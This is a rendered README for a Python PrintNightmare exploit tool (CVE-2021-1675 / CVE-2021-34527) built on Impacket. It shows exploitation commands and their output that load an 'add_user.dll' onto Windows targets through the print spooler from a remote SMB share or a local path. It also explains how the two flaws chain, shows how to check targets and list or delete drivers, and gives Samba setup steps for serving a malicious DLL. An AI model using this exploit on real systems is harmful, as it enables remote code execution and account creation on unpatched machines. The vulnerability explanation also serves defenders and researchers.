<li><a href="#credits">Credits</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="printnightmare">PrintNightmare</h1>
<p>Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.</p>
<h2 id="installtion">Installtion</h2>
<div class="codehilite"><pre><span></span><code>$ pip3 install impacket
</code></pre></div>
<h2 id="usage">Usage</h2>
<div class="codehilite"><pre><span></span><code><span class="n">Impacket</span><span class="w"> </span><span class="n">v0</span><span class="mf">.9.23</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">Copyright</span><span class="w"> </span><span class="mi">2021</span><span class="w"> </span><span class="n">SecureAuth</span><span class="w"> </span><span class="n">Corporation</span><span class="w"></span>
<span class="nl">usage</span><span class="p">:</span><span class="w"> </span><span class="n">printnightmare</span><span class="p">.</span><span class="n">py</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">h</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">debug</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">port</span><span class="w"> </span><span class="p">[</span><span class="n">destination</span><span class="w"> </span><span class="n">port</span><span class="p">]]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">target</span><span class="o">-</span><span class="n">ip</span><span class="w"> </span><span class="n">ip</span><span class="w"> </span><span class="n">address</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">hashes</span><span class="w"> </span><span class="n">LMHASH</span><span class="o">:</span><span class="n">NTHASH</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">no</span><span class="o">-</span><span class="n">pass</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">k</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">dc</span><span class="o">-</span><span class="n">ip</span><span class="w"> </span><span class="n">ip</span><span class="w"> </span><span class="n">address</span><span class="p">]</span><span class="w"></span>
<span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">name</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">name</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">env</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">name</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">path</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">path</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">dll</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">dll</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">check</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">list</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">delete</span><span class="p">]</span><span class="w"></span>
<span class="w"> </span><span class="n">target</span><span class="w"></span>
<span class="n">PrintNightmare</span><span class="w"> </span><span class="p">(</span><span class="n">CVE</span><span class="mi">-2021-1675</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="n">CVE</span><span class="mi">-2021-34527</span><span class="p">)</span><span class="w"></span>
<span class="n">positional</span><span class="w"> </span><span class="n">arguments</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="p">[[</span><span class="n">domain</span><span class="o">/</span><span class="p">]</span><span class="n">username</span><span class="p">[</span><span class="o">:</span><span class="n">password</span><span class="p">]@]</span><span class="o">&lt;</span><span class="n">targetName</span><span class="w"> </span><span class="n">or</span><span class="w"> </span><span class="n">address</span><span class="o">&gt;</span><span class="w"></span>
<span class="n">optional</span><span class="w"> </span><span class="n">arguments</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">h</span><span class="p">,</span><span class="w"> </span><span class="o">--</span><span class="n">help</span><span class="w"> </span><span class="n">show</span><span class="w"> </span><span class="n">this</span><span class="w"> </span><span class="n">help</span><span class="w"> </span><span class="n">message</span><span class="w"> </span><span class="n">and</span><span class="w"> </span><span class="n">exit</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">debug</span><span class="w"> </span><span class="n">Turn</span><span class="w"> </span><span class="n">DEBUG</span><span class="w"> </span><span class="n">output</span><span class="w"> </span><span class="n">ON</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">no</span><span class="o">-</span><span class="n">pass</span><span class="w"> </span><span class="n">don</span><span class="err">&#39;</span><span class="n">t</span><span class="w"> </span><span class="n">ask</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="p">(</span><span class="n">useful</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="o">-</span><span class="n">k</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">k</span><span class="w"> </span><span class="n">Use</span><span class="w"> </span><span class="n">Kerberos</span><span class="w"> </span><span class="n">authentication</span><span class="p">.</span><span class="w"> </span><span class="n">Grabs</span><span class="w"> </span><span class="n">credentials</span><span class="w"> </span><span class="n">from</span><span class="w"> </span><span class="n">ccache</span><span class="w"> </span><span class="n">file</span><span class="w"> </span><span class="p">(</span><span class="n">KRB5CCNAME</span><span class="p">)</span><span class="w"> </span><span class="n">based</span><span class="w"> </span><span class="n">on</span><span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="n">parameters</span><span class="p">.</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">valid</span><span class="w"> </span><span class="n">credentials</span><span class="w"></span>
<span class="w"> </span><span class="n">cannot</span><span class="w"> </span><span class="n">be</span><span class="w"> </span><span class="n">found</span><span class="p">,</span><span class="w"> </span><span class="n">it</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">use</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">ones</span><span class="w"> </span><span class="n">specified</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">command</span><span class="w"> </span><span class="n">line</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">dc</span><span class="o">-</span><span class="n">ip</span><span class="w"> </span><span class="n">ip</span><span class="w"> </span><span class="n">address</span><span class="w"> </span><span class="n">IP</span><span class="w"> </span><span class="n">Address</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">domain</span><span class="w"> </span><span class="n">controller</span><span class="p">.</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">omitted</span><span class="w"> </span><span class="n">it</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">use</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">domain</span><span class="w"> </span><span class="n">part</span><span class="w"> </span><span class="p">(</span><span class="n">FQDN</span><span class="p">)</span><span class="w"> </span><span class="n">specified</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="n">parameter</span><span class="w"></span>
<span class="nl">connection</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">port</span><span class="w"> </span><span class="p">[</span><span class="n">destination</span><span class="w"> </span><span class="n">port</span><span class="p">]</span><span class="w"></span>
<span class="w"> </span><span class="n">Destination</span><span class="w"> </span><span class="n">port</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">connect</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">MS</span><span class="o">-</span><span class="n">RPRN</span><span class="w"> </span><span class="n">named</span><span class="w"> </span><span class="n">pipe</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">target</span><span class="o">-</span><span class="n">ip</span><span class="w"> </span><span class="n">ip</span><span class="w"> </span><span class="n">address</span><span class="w"></span>
<span class="w"> </span><span class="n">IP</span><span class="w"> </span><span class="n">Address</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="n">machine</span><span class="p">.</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">ommited</span><span class="w"> </span><span class="n">it</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">use</span><span class="w"> </span><span class="n">whatever</span><span class="w"> </span><span class="n">was</span><span class="w"> </span><span class="n">specified</span><span class="w"> </span><span class="n">as</span><span class="w"> </span><span class="n">target</span><span class="p">.</span><span class="w"> </span><span class="n">This</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="n">useful</span><span class="w"> </span><span class="n">when</span><span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="n">the</span><span class="w"></span>
<span class="w"> </span><span class="n">NetBIOS</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">and</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">cannot</span><span class="w"> </span><span class="n">resolve</span><span class="w"> </span><span class="n">it</span><span class="w"></span>
<span class="nl">authentication</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">hashes</span><span class="w"> </span><span class="n">LMHASH</span><span class="o">:</span><span class="n">NTHASH</span><span class="w"></span>
<span class="w"> </span><span class="n">NTLM</span><span class="w"> </span><span class="n">hashes</span><span class="p">,</span><span class="w"> </span><span class="n">format</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="n">LMHASH</span><span class="o">:</span><span class="n">NTHASH</span><span class="w"></span>
<span class="nl">driver</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">name</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">Name</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">driver</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">env</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">Environment</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">driver</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">path</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">path</span><span class="w"> </span><span class="n">Driver</span><span class="w"> </span><span class="n">path</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">driver</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">dll</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">dll</span><span class="w"> </span><span class="n">Path</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">DLL</span><span class="w"></span>
<span class="nl">modes</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">check</span><span class="w"> </span><span class="n">Check</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="n">vulnerable</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">list</span><span class="w"> </span><span class="n">List</span><span class="w"> </span><span class="n">existing</span><span class="w"> </span><span class="n">printer</span><span class="w"> </span><span class="n">drivers</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">delete</span><span class="w"> </span><span class="n">Deletes</span><span class="w"> </span><span class="n">printer</span><span class="w"> </span><span class="n">driver</span><span class="w"></span>
</code></pre></div>
<h3 id="examples">Examples</h3>
<h4 id="exploitation">Exploitation</h4>
<h5 id="remote-dll">Remote DLL</h5>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -dll <span class="s1">&#39;\\172.16.19.1\smb\add_user.dll&#39;</span> <span class="s1">&#39;user:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Enumerating printer drivers
<span class="o">[</span>*<span class="o">]</span> Driver name: <span class="s1">&#39;Microsoft XPS Document Writer v5&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Driver path: <span class="s1">&#39;C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL&#39;</span>
<span class="o">[</span>*<span class="o">]</span> DLL path: <span class="s1">&#39;\\\\172.16.19.1\\smb\\add_user.dll&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Copying over DLL
<span class="o">[</span>*<span class="o">]</span> Successfully copied over DLL
<span class="o">[</span>*<span class="o">]</span> Trying to load DLL
<span class="o">[</span>*<span class="o">]</span> Successfully loaded DLL
</code></pre></div>
<h5 id="local-dll">Local DLL</h5>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -dll <span class="s1">&#39;C:\Windows\System32\spool\drivers\x64\3\old\1\add_user.dll&#39;</span> <span class="s1">&#39;user:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Enumerating printer drivers
<span class="o">[</span>*<span class="o">]</span> Driver name: <span class="s1">&#39;Microsoft XPS Document Writer v5&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Driver path: <span class="s1">&#39;C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL&#39;</span>
<span class="o">[</span>*<span class="o">]</span> DLL path: <span class="s1">&#39;C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\add_user.dll&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Loading DLL
<span class="o">[</span>*<span class="o">]</span> Successfully loaded DLL
</code></pre></div>
<p>Notice that the local DLL example doesn't abuse CVE-2021-34527 to copy over the DLL.</p>
<h5 id="custom-name">Custom name</h5>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -dll <span class="s1">&#39;\\172.16.19.1\smb\add_user.dll&#39;</span> -name <span class="s1">&#39;My Printer Driver&#39;</span> <span class="s1">&#39;user:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Enumerating printer drivers
<span class="o">[</span>*<span class="o">]</span> Driver name: <span class="s1">&#39;My Printer Driver&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Driver path: <span class="s1">&#39;C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL&#39;</span>
<span class="o">[</span>*<span class="o">]</span> DLL path: <span class="s1">&#39;\\\\172.16.19.1\\smb\\add_user.dll&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Copying over DLL
<span class="o">[</span>*<span class="o">]</span> Successfully copied over DLL
<span class="o">[</span>*<span class="o">]</span> Trying to load DLL
<span class="o">[</span>*<span class="o">]</span> Successfully loaded DLL
$ ./printnightmare.py -list <span class="s1">&#39;user:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Enumerating printer drivers
Name: Microsoft XPS Document Writer v4
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\n</span>tprint.inf_amd64_18b0d38ddfaee729<span class="se">\A</span>md64<span class="se">\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms001.inf_amd64_f340cb58fcd23202<span class="se">\M</span>XDW.gpd
Config file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms003.inf_amd64_9bf7e0c26ba91f8b<span class="se">\A</span>md64<span class="se">\P</span>rintConfig.dll
Version: <span class="m">4</span>
----------------------------------------------------------------
Name: Microsoft Print To PDF
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\n</span>tprint.inf_amd64_18b0d38ddfaee729<span class="se">\A</span>md64<span class="se">\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms009.inf_amd64_80184dcbef6775bc<span class="se">\M</span>PDW-PDC.xml
Config file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms003.inf_amd64_9bf7e0c26ba91f8b<span class="se">\A</span>md64<span class="se">\P</span>rintConfig.dll
Version: <span class="m">4</span>
----------------------------------------------------------------
Name: My Printer Driver
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\U</span>NIDRV.DLL
Data file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\a</span>dd_user.dll
Config file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\a</span>dd_user.dll
Version: <span class="m">3</span>
----------------------------------------------------------------
Name: Microsoft Shared Fax Driver
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\F</span>XSDRV.DLL
Data file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\F</span>XSUI.DLL
Config file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\F</span>XSUI.DLL
Version: <span class="m">3</span>
----------------------------------------------------------------
Name: Microsoft enhanced Point and Print compatibility driver
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\u</span>nishare.gpd
Config file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\P</span>rintConfig.dll
Version: <span class="m">3</span>
----------------------------------------------------------------
</code></pre></div>
<h4 id="check-if-target-is-vulnerable">Check if target is vulnerable</h4>
<h5 id="unpatched-windows-10">Unpatched Windows 10</h5>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -check <span class="s1">&#39;user:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Target appears to be vulnerable!
</code></pre></div>
<h5 id="patched-windows-server-2022">Patched Windows Server 2022</h5>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -check <span class="s1">&#39;user:Passw0rd@172.16.19.135&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>!<span class="o">]</span> Target does not appear to be vulnerable
</code></pre></div>
<h4 id="list-current-printer-drivers">List current printer drivers</h4>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -list <span class="s1">&#39;user:Passw0rd@172.16.19.135&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Enumerating printer drivers
Name: Microsoft XPS Document Writer v4
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\n</span>tprint.inf_amd64_075615bee6f80a8d<span class="se">\A</span>md64<span class="se">\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms001.inf_amd64_8bc7809b71930efc<span class="se">\M</span>XDW.gpd
Config file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms003.inf_amd64_c9865835eff4a608<span class="se">\A</span>md64<span class="se">\P</span>rintConfig.dll
Version: <span class="m">4</span>
----------------------------------------------------------------
Name: Microsoft Print To PDF
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\n</span>tprint.inf_amd64_075615bee6f80a8d<span class="se">\A</span>md64<span class="se">\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms009.inf_amd64_6dc3549941ff1a57<span class="se">\M</span>PDW-PDC.xml
Config file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms003.inf_amd64_c9865835eff4a608<span class="se">\A</span>md64<span class="se">\P</span>rintConfig.dll
Version: <span class="m">4</span>
----------------------------------------------------------------
Name: Microsoft enhanced Point and Print compatibility driver
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\u</span>nishare.gpd
Config file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\P</span>rintConfig.dll
Version: <span class="m">3</span>
----------------------------------------------------------------
</code></pre></div>
<h4 id="delete-printer-driver">Delete printer driver</h4>
<p>May require administrative privileges.</p>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -delete -name <span class="s1">&#39;Microsoft XPS Document Writer v5&#39;</span> <span class="s1">&#39;administrator:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Deleted printer driver!
</code></pre></div>
<h2 id="details">Details</h2>
<p>PrintNightmare consists of two CVE's, CVE-2021-1675 / CVE-2021-34527. </p>
<h3 id="cve-2021-1675">CVE-2021-1675</h3>
<p>A non-administrative user is allowed to add a new printer driver. This vulnerability was fixed by only allowing administrators to add new printer drivers. A patched version of the print spooler will return <code>RPC_E_ACCESS_DENIED</code> (Code: <code>0x8001011b</code>) if a non-administrator tries to add a new printer driver. </p>
<h3 id="cve-2021-34527">CVE-2021-34527</h3>
<p>When <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b">adding a new printer driver</a>, the <code>pDataFile</code> parameter in the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/3a3f9cf7-8ec4-4921-b1f6-86cf8d139bc2">DRIVER_CONTAINER</a> allows UNC paths. The DLL specified in <code>pDataFile</code> will however <strong>not</strong> be loaded, <em>but</em> it will get copied over to a local path allowing us to create a new printer driver with the <code>pConfigFile</code> parameter pointing to the local path which will load the DLL. A patched version of the printer spooler will return <code>ERROR_INVALID_PARAMETER</code> (Code: <code>0x57</code>)</p>
<h3 id="combining-the-pieces">Combining the pieces</h3>
<p>Only CVE-2021-1675 is needed if the malicious DLL is already located on the target.</p>
<p>For PrintNightmare, if the DLL is not a local path, then CVE-2021-34527 can be used to fetch the DLL via UNC paths. For that reason, it is necessary to serve the DLL over SMB. If you're not familiar with SMB and UNC, read the following subsection.</p>
<p>When creating a new printer driver, the DLL in the <code>pDataFile</code> parameter will <strong>not</strong> be loaded for security reasons. However, it <em>will</em> be copied over to <code>C:\Windows\system32\spool\drivers\x64\3\</code>. Then, we could create a new printer driver that uses <code>pConfigFile</code> (which will load the DLL) with the local path. However, the DLL is in use by the first printer driver when creating the second printer driver. Instead, we could overwrite the first printer driver, which will make the printer driver's DLLs get copied over to <code>C:\Windows\system32\spool\drivers\x64\3\old\&lt;I&gt;\</code>, where <code>&lt;I&gt;</code> is incremented for each DLL. Now we can create a third printer driver that will use the local path <code>C:\Windows\system32\spool\drivers\x64\3\old\&lt;I&gt;\</code>, since the DLL is no longer used. Now it's just a matter of guessing <code>&lt;I&gt;</code> which will start incrementing from <code>1</code>.</p>
<p>Note that the DLL will keep its filename locally, so if you initially run the exploit with <code>foo.dll</code> and it gets saved to <code>C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll</code> and you then change the contents of <code>foo.dll</code> locally and run the exploit again and it now gets saved to <code>C:\Windows\system32\spool\drivers\x64\3\old\5\foo.dll</code>, then the original <code>foo.dll</code> will be used since it is located in <code>C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll</code>. Instead, simply change the filename if you change the contents of the DLL.</p>
<h4 id="smb-and-unc">SMB and UNC</h4>
<p>In short, a UNC path is a path to a file or folder on a network rather than a local file, and it contains the server name and path. For instance, the UNC path <code>\\10.0.0.2\files\foo.txt</code> is a file <code>foo.txt</code> that is served from the <code>files</code> share of the server <code>10.0.0.2</code>. Usually, a share is served over SMB, but WebDAV is also supported. To create an SMB share on Linux, the easiest and most reliable way is to use the <code>Samba</code> package.</p>
<p>To install <code>Samba</code> with <code>apt</code>:</p>
<div class="codehilite"><pre><span></span><code>$ sudo apt install samba
</code></pre></div>
<p>Edit the <code>/etc/samba/smb.conf</code> and add the following at the end of the file:</p>
<div class="codehilite"><pre><span></span><code><span class="k">[smb]</span><span class="w"></span>
<span class="w"> </span><span class="na">comment</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">Samba</span><span class="w"></span>
<span class="w"> </span><span class="na">path</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">/tmp/share</span><span class="w"></span>
<span class="w"> </span><span class="na">guest ok</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">yes</span><span class="w"></span>
<span class="w"> </span><span class="na">read only</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">yes</span><span class="w"></span>
<span class="w"> </span><span class="na">browsable</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">yes</span><span class="w"></span>
<span class="w"> </span><span class="na">force user</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">nobody</span><span class="w"></span>
</code></pre></div>
<p>This will create a new share called <code>smb</code> and serve the files inside <code>/tmp/share</code>. It allows for anonymous access, and the local user <code>nobody</code> will be used to browse the files.</p>
<p>Then start the Samba service by doing:</p>
<div class="codehilite"><pre><span></span><code>$ sudo service smbd start
</code></pre></div>
<p>Suppose your Linux machine has the IP <code>192.168.1.100</code> and you wish to serve the <code>evil.dll</code>, then the UNC path in this scenario will be <code>\\192.168.1.100\smb\evil.dll</code>. </p>
<h2 id="authors">Authors</h2>
<ul>
<li><a href="https://github.com/ly4k">@ly4k</a></li>
</ul>
<h2 id="credits">Credits</h2>
<ul>
<li><a href="https://github.com/cube0x0">@cube0x0</a>'s <a href="https://github.com/cube0x0/CVE-2021-1675">implementation</a></li>
<li><a href="https://github.com/SecureAuthCorp/impacket">Impacket</a></li>
</ul>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
function linkClick(obj) {
if (obj.open) {
//console.log('open');
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
} else {
//console.log('closed');
sessionStorage.removeItem(obj.id);
}
}
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
</script>
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
<script type="text/x-mathjax-config">
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink